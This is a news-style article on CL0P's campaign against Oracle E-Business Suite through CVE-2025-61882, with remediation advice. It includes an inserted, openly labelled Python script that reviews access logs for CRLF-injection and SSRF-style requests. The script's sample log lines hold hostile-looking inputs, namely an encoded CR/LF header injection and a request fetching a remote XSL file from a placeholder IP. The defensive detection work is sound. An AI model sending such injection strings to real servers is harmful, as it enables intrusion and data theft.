Major Security Breach: Dozens of Organizations Affected by Oracle-Linked Hacking Campaign

Author
Economic Affair
October 9, 2025

Google has issued a critical alert revealing that dozens of organizations have been compromised in a sophisticated hacking campaign targeting Oracle’s E-Business Suite through the exploitation of CVE-2025-61882, a critical vulnerability with a CVSS score of 9.8 that allows unauthenticated attackers to achieve remote code execution. This discovery marks one of the most significant cybersecurity incidents affecting enterprise business infrastructure, with mass amounts of sensitive customer data stolen in what security experts believe to be a highly coordinated operation.

The threat actor behind this ambitious hacking campaign is believed to be CL0P, a dangerous ransomware group that has exploited multiple Oracle E-Business Suite vulnerabilities, including a zero-day flaw, to steal large amounts of data from several victims. The scope and sophistication of this Oracle EBS hacking campaign underscore the critical importance of cybersecurity preparedness for organizations running Oracle business software.


What is the Oracle EBS Hacking Campaign?

Understanding the Scope of the CVE-2025-61882 Vulnerability

Based on emerging evidence and ongoing forensic investigations, CL0P orchestrated an intrusion that allowed unauthorized access to on-premise, customer-managed Oracle E-Business Suite solutions, enabling data enumeration and exfiltration between July and September 2025. This means that organizations using Oracle’s business management software were vulnerable to attackers gaining complete access to their most critical business data without requiring authentication credentials.

The vulnerability identified as CVE-2025-61882 is particularly dangerous because it affects the Oracle Concurrent Processing component of the E-Business Suite. CL0P’s attacks exploit a sophisticated server-side chain using SSRF and CRLF injection to force EBS servers to fetch and execute malicious XSL payloads, achieving remote code execution without disk-based artifacts. This technical sophistication demonstrates that the attackers invested significant resources in developing attack methods that avoid traditional detection mechanisms.

Timeline of the Oracle EBS Hacking Campaign

The Oracle EBS hacking campaign unfolded in distinct phases. CL0P exploited multiple vulnerabilities in Oracle EBS since at least August 2025, stealing large amounts of data from several victims and sending extortion emails since the end of September 2025. The extended timeline between initial compromise and extortion attempts suggests attackers spent considerable time within victim networks, gathering intelligence and exfiltrating data before making their presence known through ransom demands.


CL0P Ransomware Group: A History of Sophisticated Attacks

Who is Behind the Oracle EBS Hacking Campaign?

CL0P is not a newcomer to large-scale cybercriminal operations. Google’s investigation noted that the group has demonstrated a long history of compromising third-party software and service providers. This particular Oracle EBS hacking campaign represents a continuation of CL0P’s established operational model, which focuses on targeting widely used enterprise software to maximize the number of victim organizations and the volume of data that can be stolen.

The group’s history includes previous attacks against major software supply chains, making them one of the most dangerous threat actors in the global cybersecurity landscape. Their targeting of Oracle, a company serving millions of businesses worldwide through its E-Business Suite, amplifies the potential impact of this breach exponentially.


The Oracle EBS Hacking Campaign: How Attackers Operated

Multi-Stage Attack Methodology

A widespread orchestrated email extortion campaign emerged targeting users of on-premise, customer-managed Oracle E-Business Suite between the end of September 2025 and beginning of October 2025. The extortion phase of this Oracle EBS hacking campaign involved threatening to sell stolen data unless organizations paid substantial ransom fees.

Ransom Demands and Extortion Tactics

Threat actors in the CL0P-linked campaign have been making ransom demands as high as $50 million, backing up their claims with proofs of compromise. These enormous demands reflect the critical nature of the data stolen and the potential business impact on affected organizations. The fact that attackers can provide proof of compromise makes these threats particularly credible and difficult for victims to ignore.


What Data Was Stolen in the Oracle EBS Hacking Campaign?

Mass Amounts of Customer Information at Risk

Google confirmed that “mass amounts of customer data” were stolen in this operation. Organizations using Oracle E-Business Suite depend on this platform to manage essential business functions including customer relationships, supplier interactions, manufacturing processes, logistics operations, and financial transactions. The breadth of functions managed through Oracle EBS means that the stolen data likely includes:

  • Customer personal information and contact details
  • Supplier and vendor business intelligence
  • Manufacturing specifications and production data
  • Logistics and supply chain information
  • Financial transaction records
  • Internal business communications and documents

This comprehensive data theft creates significant risks not only for the directly affected organizations but also for their customers, suppliers, and business partners whose information may have been compromised.


Industry Response to the Oracle EBS Hacking Campaign

Google’s Investigation and Findings

Google, through its security research team, discovered the campaign and analyzed the threat actor’s techniques. The investigation revealed that CL0P likely dedicated significant resources to pre-attack research before executing the intrusion into Oracle E-Business Suite systems. This level of preparation suggests that attackers studied Oracle’s infrastructure for an extended period before launching their attacks, making detection and prevention increasingly difficult.

Oracle’s Official Response

Oracle confirmed the reports of extortion activity targeting its clients but has not publicly disclosed the full extent of the compromises. The company is working with affected customers and security researchers to develop and deploy patches for the vulnerability. Organizations running Oracle EBS should expect guidance from Oracle regarding patching procedures and interim security measures.


Critical Actions for Oracle EBS Users

Immediate Steps to Take

Organizations using Oracle E-Business Suite should immediately take the following actions:

Apply Security Patches: Install Oracle’s emergency patches for CVE-2025-61882 as soon as they become available. This is the most critical step to prevent new intrusions through this vulnerability.

Conduct Forensic Investigation: Organizations that suspect they may be affected should engage cybersecurity forensic professionals to determine if unauthorized access has occurred within their systems.

Monitor for Extortion Communications: If your organization has received suspicious emails claiming to have compromised your Oracle EBS system, preserve all communications and contact law enforcement and cybersecurity professionals immediately.

Review Access Logs: Analyze Oracle EBS access logs from August 2025 forward to identify any suspicious activities or unauthorized access attempts.

Notify Stakeholders: If your organization has been compromised, notify customers, suppliers, and relevant stakeholders about the potential data exposure in accordance with applicable data breach notification laws.
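The "Review Access Logs" step above can be partly automated. The following Python script is an added example (not code from the article, Google, Oracle or any vendor named here): it parses web-server access log lines from a reverse proxy in front of an EBS instance, keeps only entries from August 2025 forward, and flags the two request shapes the article associates with the attack chain, namely URL-encoded CR/LF sequences (CRLF injection) and absolute URLs supplied as query parameter values (SSRF). The log format, paths, IP addresses and sample lines are constructed placeholders, and the two heuristics are assumptions of this example, not Oracle-published indicators; a real review would add the vendor's indicators on top of them.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined log format as written by a typical Apache/nginx front end (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The article advises reviewing logs "from August 2025 forward".
REVIEW_FROM = datetime(2025, 8, 1)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Drop the timezone offset; the review window is coarse (months), so UTC vs local is irrelevant here.
    rec["ts"] = datetime.strptime(rec["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
    return rec


def crlf_injection(target):
    """CR or LF in the request target, whether encoded once (%0d%0a) or twice (%250d%250a)."""
    decoded = unquote(unquote(target))
    return "\r" in decoded or "\n" in decoded


def ssrf_style_url_param(target):
    """A query parameter whose value is itself an absolute URL: the classic SSRF input shape."""
    query = urlsplit(target).query
    for _, value in parse_qsl(query, keep_blank_values=True):
        v = unquote(value).strip().lower()
        if v.startswith(("http://", "https://", "ftp://", "file://", "gopher://")):
            return True
    return False


def review_access_log(lines, review_from=REVIEW_FROM):
    """Return one finding per suspicious request at or after review_from."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["ts"] < review_from:
            continue
        reasons = []
        if crlf_injection(rec["target"]):
            reasons.append("encoded CR/LF in request target")
        if ssrf_style_url_param(rec["target"]):
            reasons.append("absolute URL passed as a query parameter")
        if reasons:
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"].isoformat(),
                "target": rec["target"],
                "reasons": reasons,
            })
    return findings


# Constructed sample lines (not real telemetry); hosts, paths and addresses are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jul/2025:10:00:00 +0000] "GET /ebs/login HTTP/1.1" 200 1234',
    '10.0.0.5 - - [02/Sep/2025:03:14:07 +0000] "GET /ebs/login HTTP/1.1" 200 1234',
    '203.0.113.9 - - [02/Sep/2025:03:15:22 +0000] "GET /ebs/fetch?src=http://203.0.113.9/remote.xsl HTTP/1.1" 200 88',
    '203.0.113.9 - - [02/Sep/2025:03:15:30 +0000] "GET /ebs/item?id=1%0d%0aX-Injected:%201 HTTP/1.1" 302 0',
    # Same SSRF shape but before the review window, so it is not reported.
    '198.51.100.4 - - [05/Jul/2025:09:00:00 +0000] "GET /ebs/fetch?src=http://198.51.100.4/x HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for f in review_access_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["target"], "->", "; ".join(f["reasons"]))
```

Feed the script a real log with `review_access_log(open(path))`; any hit is a lead for the forensic investigation recommended above, not proof of compromise, since legitimate integrations sometimes pass URLs as parameters.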


Understanding CVE-2025-61882: The Technical Vulnerability

CVSS Score and Severity Assessment

CVE-2025-61882 has a CVSS score of 9.8, indicating a critical vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise and take control of the Oracle Concurrent Processing component. A CVSS score of 9.8 represents near-maximum severity, meaning the vulnerability is extremely dangerous and should be prioritized as the highest security concern.

Why This Vulnerability is Particularly Dangerous

The vulnerability is remotely exploitable without requiring authentication, meaning attackers do not need valid user credentials to compromise systems. This removes a significant barrier to entry that would normally protect enterprise systems. The combination of remote exploitability, lack of authentication requirement, and the critical nature of Oracle E-Business Suite makes this vulnerability exceptionally dangerous in real-world attack scenarios.


Expert Analysis of the Oracle EBS Hacking Campaign

Security researchers have provided detailed analysis of the CL0P campaign. According to Jake Knott, principal security researcher at watchTowr, CL0P has been exploiting multiple vulnerabilities in Oracle EBS since at least August 2025, stealing large amounts of data from several victims.

The extended timeline of exploitation before public disclosure suggests that the vulnerability was unknown to Oracle for an extended period. This type of zero-day vulnerability exploitation gives attackers a significant advantage, as defenders cannot rely on patches to protect their systems.


Conclusion: The Oracle EBS Hacking Campaign and Future Security Implications

The Oracle EBS hacking campaign affecting dozens of organizations represents a significant escalation in supply-chain focused cyberattacks. By targeting Oracle’s widely-used E-Business Suite, CL0P was able to compromise multiple enterprise organizations simultaneously, stealing vast amounts of sensitive data that affects not only the directly compromised organizations but also their entire ecosystem of customers, suppliers, and business partners.

This incident reinforces several critical cybersecurity lessons: the importance of timely patch management, the need for robust monitoring of enterprise applications, and the necessity of maintaining strong cybersecurity practices even within established organizations using trusted software platforms. Organizations must remain vigilant in implementing security updates and maintaining awareness of emerging threats to their critical business systems.

For more information on cybersecurity best practices and threat intelligence, visit Singhadarbar.
